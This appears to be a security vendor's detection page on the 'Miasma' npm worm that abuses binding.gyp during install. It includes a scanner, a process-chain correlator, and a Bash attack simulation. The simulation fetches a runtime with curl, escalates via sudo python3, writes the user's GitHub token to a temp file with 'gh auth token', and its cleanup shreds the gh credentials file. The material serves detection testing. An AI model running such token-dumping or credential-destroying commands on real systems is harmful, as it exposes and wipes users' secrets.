Miasma Supply Chain Attack Spreads Through the Phantom Gyp Worm
Summary
A new Miasma worm variant is spreading through the npm ecosystem by abusing a malicious binding.gyp file that triggers code execution during npm install. This method slips past many traditional script-based checks, downloads an alternate Bun runtime, steals CI/CD and cloud credentials, and sends the collected data to a GitHub dead-drop account. More than 57 packages were compromised during a fast-moving campaign that unfolded in under two hours on June 3, 2026. The worm also plants backdoors inside AI coding assistant configuration files.
Investigation
Researchers recreated the intrusion inside a hardened GitHub Actions runner and captured the complete process tree, network traffic, and code artifacts involved in the attack. Their analysis revealed the Phantom Gyp technique, a four-stage obfuscated payload chain, and use of Bun to avoid detections focused only on Node.js behavior. Credential theft was carried out by reading runner memory and querying cloud instance metadata endpoints. Exfiltration then took place through authenticated GitHub API requests to a malicious account that dynamically created repositories to store the stolen data.
Mitigation
Defenders should reduce exposure by blocking native build steps, disabling node-gyp where possible, or ignoring install scripts in high-risk environments. Registry cooldown windows and verification of SLSA provenance signatures can also help limit package tampering. Security teams should watch for unexpected Bun downloads, oversized root index.js files, and creation of new GitHub repositories by CI-issued tokens. Any exposed tokens or cloud credentials should be rotated immediately.
Response
Organizations should detect binding.gyp files containing patterns such as <!(node index.js ...), alert on Bun runtime downloads, and stop the affected workflow as soon as malicious activity is confirmed. Repositories should be scanned for injected AI assistant configuration files and cleaned promptly. All stolen tokens must be revoked and rotated, CI/CD permission scopes reviewed, and a full incident response investigation launched to determine the extent of credential exposure.
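One way to run the binding.gyp check described above across an installed dependency tree, as an added example that is not code from the original page or from the researchers. The `high`/`review` triage rule and the sample packages are assumptions constructed for illustration. Command expansions are common in legitimate native addons, so the scanner separates a runtime started on a script from an inline `-p`/`-e` lookup.

```python
import re
import shlex
import tempfile
from pathlib import Path

# GYP expands <!(cmd) and <!@(cmd) by running cmd in a shell while the build
# files are generated, which happens during `npm install`.
START = re.compile(r"<!@?\(")
RUNTIMES = {"node", "nodejs", "bun"}

def expansions(text):
    """Yield the command inside each expansion, honouring nested parentheses."""
    for m in START.finditer(text):
        depth, i = 1, m.end()
        while i < len(text) and depth:
            depth += {"(": 1, ")": -1}.get(text[i], 0)
            i += 1
        yield text[m.end():i - 1 if depth == 0 else i].strip()

def classify(cmd):
    """Assumed triage rule: a runtime whose first argument is not a flag is 'high'."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return "high"  # unbalanced quoting cannot be reasoned about, so escalate
    runs_file = (len(argv) >= 2 and Path(argv[0]).name in RUNTIMES
                 and not argv[1].startswith("-"))
    return "high" if runs_file else "review"

def scan(root):
    """Return (path, severity, command) for every expansion in binding.gyp files."""
    root = Path(root)
    return [(gyp.relative_to(root).as_posix(), classify(cmd), cmd)
            for gyp in sorted(root.rglob("binding.gyp"))
            for cmd in expansions(gyp.read_text(errors="replace"))]

def demo():
    """Scan a constructed node_modules tree: one include lookup, one script run."""
    samples = {  # constructed sample files, not taken from any real package
        "good-addon": '{"targets":[{"target_name":"a","include_dirs":'
                      '["<!(node -p \\"require(\'node-addon-api\').include_dir\\")"]}]}',
        "bad-pkg": '{"targets":[{"target_name":"b","sources":["<!(node index.js)"]}]}',
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in samples.items():
            pkg = Path(tmp, "node_modules", name)
            pkg.mkdir(parents=True)
            (pkg / "binding.gyp").write_text(body)
        return scan(tmp)

if __name__ == "__main__":
    for finding in demo():
        print(*finding, sep="\t")
```

A `review` result still means a command runs at install time; it only ranks below a runtime started on a file shipped in the package.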
Detections
Remote File Upload / Download via Standard Tools (via cmdline)
Linux Script Was Created In Temporary Folders (via file_event)
Hidden File Was Created On Linux Host (via file_event)
IOCs (HashSha256) to detect: Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp
IOCs (HashMd5) to detect: Miasma npm Supply Chain Attack: Self-Spreading Worm via Phantom Gyp
Miasma Npm Supply Chain Attack Detection [Network Indicators]
Miasma npm Supply Chain Attack Detection via Phantom Gyp Technique [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
- Attack Narrative & Commands:
  An attacker compromises an open-source npm package, adding a malicious binding.gyp. When a developer runs npm install, the package’s build process invokes node-gyp rebuild. Inside the generated build script, the attacker:
  - Downloads the Bun runtime (signed binary) via curl to a temporary directory (/tmp/b-<rand>/).
  - Elevates privileges by invoking sudo python3 to unpack the zip and place the binary in /usr/local/bin.
  - Harvests the developer’s GitHub token using gh auth token.
  - Executes a payload (bun run /tmp/p1764ajw42rg.js) that exfiltrates data.
  Each step appears verbatim in the process-creation logs, satisfying the Sigma rule’s contains list.
- Regression Test Script: The following Bash script reproduces the exact chain of commands in a controlled lab environment.

```bash
#!/usr/bin/env bash
# miasma_phantom_gyp_simulation.sh
set -euo pipefail

# 1. Prepare a fake npm package with malicious binding.gyp
PKG_DIR=$(mktemp -d /tmp/miasma_pkg.XXXX)
cd "$PKG_DIR"
npm init -y >/dev/null 2>&1
cat > binding.gyp <<'EOF'
{
  "targets": [
    {
      "target_name": "evil",
      "sources": [ "evil.c" ]
    }
  ]
}
EOF
echo "int main(){return 0;}" > evil.c

# Install node-gyp locally
npm install node-gyp >/dev/null 2>&1

# 2. Run node-gyp rebuild (first indicator)
./node_modules/.bin/node-gyp rebuild

# 3. Download Bun runtime (second indicator)
TMPDIR=$(mktemp -d /tmp/b-XXXXXX)
curl -sSL "https://github.com/oven-sh/bun/releases/download/bun-v1.3.13/bun-linux-x64-baseline.zip" -o "$TMPDIR/bun.zip"

# 4. Elevate with sudo python3 to unzip (third indicator)
# The directory is passed as an argument because sudo does not forward
# unexported shell variables to the Python process.
sudo python3 - "$TMPDIR" <<'PYTHON'
import os, sys, zipfile
dest = sys.argv[1]
with zipfile.ZipFile(os.path.join(dest, 'bun.zip'), 'r') as z:
    z.extractall(dest)
PYTHON
# extractall() does not restore the executable bit, so locate the binary and set it
BUN_BIN=$(find "$TMPDIR" -type f -name bun -print -quit)
sudo chmod 755 "$BUN_BIN"

# 5. Acquire GitHub token (fourth indicator)
# Note: This requires GitHub CLI to be installed and previously authenticated.
gh auth token > "$TMPDIR/gh_token.txt"

# 6. Execute malicious payload via Bun (fifth indicator)
# Create a dummy JS payload
echo "console.log('exfiltrated');" > "$TMPDIR/p1764ajw42rg.js"
"$BUN_BIN" run "$TMPDIR/p1764ajw42rg.js"

echo "Simulation complete. Check your SIEM for the generated alerts."
```

- Cleanup Commands: Remove temporary artifacts and reverse privilege escalation artifacts.

```bash
#!/usr/bin/env bash
# cleanup_miasma_simulation.sh
set -euo pipefail

# PKG_DIR and TMPDIR must hold the paths the simulation created (export them or
# run in the same shell). Refuse anything else, since TMPDIR is often set to /tmp.
case "$PKG_DIR" in /tmp/miasma_pkg.*) ;; *) echo "unexpected PKG_DIR: $PKG_DIR" >&2; exit 1 ;; esac
case "$TMPDIR" in /tmp/b-*) ;; *) echo "unexpected TMPDIR: $TMPDIR" >&2; exit 1 ;; esac

# Shred the token written by the simulation, then remove temporary directories
# (sudo is needed because the archive was extracted as root)
shred -u "$TMPDIR/gh_token.txt" 2>/dev/null || true
sudo rm -rf "$PKG_DIR" "$TMPDIR"

# Optionally remove the installed Bun binary from /usr/local/bin if it was placed there
if [ -e /usr/local/bin/bun ]; then
  sudo rm -f /usr/local/bin/bun
fi

# Clear any captured GitHub token
# This deletes the GitHub CLI's stored credentials; gh must be re-authenticated afterwards.
shred -u "$HOME/.config/gh/hosts.yml" 2>/dev/null || true

echo "Cleanup finished."
```
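The attack narrative above lists five steps that each leave a process-creation event. This added example (not the Sigma rule referenced on the page, and not code from the original page) attributes each event to its enclosing npm install through the parent chain and reports installs where several steps occur in order, which cuts the noise from matching any single substring. The stage regexes, the `(pid, ppid, cmdline)` event shape, the `min_stages` threshold and the sample events are assumptions constructed for illustration.

```python
import re

# One pattern per step of the narrative; the regexes themselves are assumptions.
STAGES = [
    ("gyp_rebuild", re.compile(r"node-gyp(\.js)?\s+rebuild")),
    ("bun_download", re.compile(r"\bcurl\b.*\bbun\b.*\.zip")),
    ("sudo_python", re.compile(r"\bsudo\s+python3\b")),
    ("gh_token", re.compile(r"\bgh\s+auth\s+token\b")),
    ("bun_run", re.compile(r"\bbun\s+run\s+/tmp/")),
]
NPM_INSTALL = re.compile(r"\bnpm\s+(install|ci)\b")

def install_root(pid, procs):
    """Walk the parent chain and return the pid of the enclosing npm install, if any."""
    seen = set()
    while pid in procs and pid not in seen:   # `seen` guards against pid-reuse loops
        seen.add(pid)
        ppid, cmd = procs[pid]
        if NPM_INSTALL.search(cmd):
            return pid
        pid = ppid
    return None

def correlate(events, min_stages=3):
    """Return {npm pid: [stage names]} for installs with >= min_stages steps in order."""
    procs, chains = {}, {}
    for pid, ppid, cmd in events:             # events arrive in time order
        procs[pid] = (ppid, cmd)
        root = install_root(pid, procs)
        if root is None:
            continue
        chain = chains.setdefault(root, [])
        for idx, (_, rx) in enumerate(STAGES):
            if rx.search(cmd) and (not chain or idx > chain[-1]):
                chain.append(idx)
                break
    return {root: [STAGES[i][0] for i in chain]
            for root, chain in chains.items() if len(chain) >= min_stages}

SAMPLE = [  # constructed process-creation events: (pid, ppid, cmdline)
    (100, 1, "npm install"),
    (101, 100, "sh -c node-gyp rebuild"),
    (102, 101, "curl -sSL https://github.com/oven-sh/bun/releases/download/"
               "bun-v1.3.13/bun-linux-x64-baseline.zip -o /tmp/b-abc123/bun.zip"),
    (103, 101, "sudo python3 -"),
    (104, 101, "gh auth token"),
    (105, 101, "/tmp/b-abc123/bun run /tmp/b-abc123/p1764ajw42rg.js"),
    (201, 200, "gh auth token"),              # developer's own shell: no npm ancestor
    (300, 1, "npm ci"),
    (301, 300, "sh -c node-gyp rebuild"),     # ordinary native addon build: one stage
]

if __name__ == "__main__":
    print(correlate(SAMPLE))
```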